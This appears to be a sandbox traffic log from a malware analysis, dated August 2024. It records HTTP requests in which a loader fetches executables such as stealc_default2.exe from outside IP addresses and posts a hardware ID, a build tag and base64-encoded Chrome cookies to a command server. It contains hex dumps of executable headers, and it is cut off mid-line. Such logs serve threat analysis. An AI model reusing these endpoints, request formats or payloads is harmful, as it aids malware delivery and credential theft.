00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 26 Aug 2024 21:29:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:31 GMTContent-Type: application/octet-streamContent-Length: 10481152Last-Modified: Sun, 25 Aug 2024 13:30:36 GMTConnection: keep-aliveETag: "66cb31fc-9fee00"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 83 2e cb 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c4 5d 00 00 26 42 00 00 00 00 00 60 d3 5d 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 30 a1 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 60 67 00 9c 00 00 00 00 70 66 00 a6 50 00 00 00 30 71 00 00 f2 2f 00 00 40 6c 00 30 ec 04 00 00 00 00 00 00 00 00 00 00 90 67 00 f8 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 67 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 84 66 00 f8 12 00 00 00 d0 66 00 46 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f0 c3 5d 00 00 10 00 00 00 c4 5d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 18 b1 07 00 00 e0 5d 00 00 b2 07 00 00 c8 5d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 2c c5 00 00 00 a0 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 a6 50 00 00 00 70 66 00 00 52 00 00 00 7a 65 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 46 8e 00 00 00 d0 66 00 00 90 00 00 00 cc 65 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9c 00 00 00 00 60 67 00 00 02 00 00 00 5c 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 e4 01 00 00 00 70 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 80 67 00 00 02 00 00 00 5e 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 ac 04 00 00 90 67 00 00 ae 04 00 00 60 66 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 30 ec 04 00 00 40 6c 00 00 ee 04 00 00 0e 6b 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 26 Aug 2024 21:29:42 GMTContent-Type: application/octet-streamContent-Length: 747008Last-Modified: Sun, 25 Aug 2024 12:24:28 GMTConnection: keep-aliveETag: "66cb227c-b6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8d 1c cb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 5a 0b 00 00 0a 00 00 00 00 00 00 9e 79 0b 00 00 20 00 00 00 80 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0b 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 79 0b 00 4b 00 00 00 00 80 0b 00 d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 59 0b 00 00 20 00 00 00 5a 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 06 00 00 00 80 0b 00 00 08 00 00 00 5c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0b 00 00 02 00 00 00 64 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 79 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 18 93 07 00 38 e6 03 00 03 00 00 00 1b 05 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 df 00 aa f3 24 92 bf 27 ec 40 ae d9 11 da a2 49 06 e0 24 4f 19 ab 08 55 6a 98 b6 3e b9 26 4f 08 0e 49 96 ba 2a ac 14 14 ce 4a b0 83 dc f2 fc c4 16 52 16 94 0e a5 d6 50 6d 8c 6b c4 4a 52 1f fa 39 ec 0f cf 38 7f df af ed f8 d4 22 a9 2f 25 63 83 d5 b0 af 8b b7 cb 57 d1 ce 35 79 42 49 c3 fc af d5 53 5c db 0e 3c e1 3a a9 4c 48 21 c2 db 32 ee a2 4b 97 17 4f fa 35 5d 9f 5b 4f d1 11 e3 8b c8 ca ac 9b 84 64 e3 b0 66 70 4f 87 af ce 67 40 69 70 df 3d e8 d6 fc f8 86 04 55 c9 2d 94 e7 12 49 d7 f0 7d d3 ca f6 4b cc 97 a4 f9 d5 69 09 c4 2c 70 de 44 ec 3c 4c 28 41 89 41 5a 48 b5 a3 38 e1 2e b1 fa 98 9f 82 0d 32 02 6c 29 f4 aa 7f f9 0d 66 3f 99 a4 01 6f 87 eb e2 ae bf 65 d9 ba c6 36 45 3d 1a af aa ec d4 7f 1c 8c 54 ec dc 63 d1 0c e4 91 7f 71 27 19 38 0b cd b6 d1 28 93 5f d8 7d b2 4e 79 fa 72 ad ef ce 25 4d a6 13 ff 39 c6 7b 1f 1d f2 3b 72 74 90 7c 94 ae 23 0d 12 bd c8 1f 07 06 4e 0f f9 38 db 7e 0b 3c 0f fa 12 71 fa d3 50 8c 74 69 f6 18 e1 a6 df 3a ae d

Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic	HTTP traffic detected: GET /inc/GOLD.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/crypteda.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /setup2.exe HTTP/1.1Host: 154.216.18.223
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /inc/stealc_default2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.17Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDAHost: 185.215.113.17Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 31 38 37 36 43 42 45 36 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"F51876CBE6684217651120------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"default2------GHJJDGHCBGDHIECBGIDA--
Source: global traffic	HTTP traffic detected: GET /inc/Set-up.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEBHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 2d 2d 0d 0a Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="message"browsers------JJDBAAEGDBKKECBGIJEB--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHIHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 2d 2d 0d 0a Data Ascii: ------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="message"plugins------KECGDBFCBKFIDHIDHDHI--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIIDHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 2d 2d 0d 0a Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="message"fplugins------HDGIEBGHDAEBGDGCFIID--
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJEHost: 185.215.113.17Content-Length: 7295Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 59 31 4e 44 45 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 63 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 31 4e 7a 51 77 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 6b 35 68 5a 48 46 58 4f 58 56 55 59 31 6b 77 54 31 41 32 53 54 4e 68 5a 6d 35 79 4e 7a 46 76 4e 6b 56 36 59 56 6c 4d 63 32 52 77 56 7a 52 56 52 56 6c 4f 4d 33 5a 5a 63 56 39 79 59 6c 4a 79 54 6b 5a 34 54 54 46 71 62 33 70 51 52 33 56 6f 61 6b 39 53 51 6c 70 4c 53 30 31 36 4d 6e 52 6b 52 48 42 57 5a 54 64 6b 54 6e 56 55 56 33 41 30 51 33 6c 4c 4c 58 70 30 4e 55 6c 7a 4e 6e 64 57 52 57 78 32 5a 56 64 42 5a 6b 74 52 5a 33 64 4f 53 6d 6c 4c 53 33 52 59 53 45 4e 44 51 32 31 79 62 47 64 36 57 6c 52 73 4e 55 4e 70 53 32 70 55 5a 55 45 79 61 56 46 78 5a 6a 5a 36 62 46 4a 4c 4d 6d 67 34 64 32 63 78 61 46 5a 77 53 58 4e 58 63 32 46 4c 63 57 46 58 53 6e 6c 49 54 56 42 47 4d 30 70 42 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6Y
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDAHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 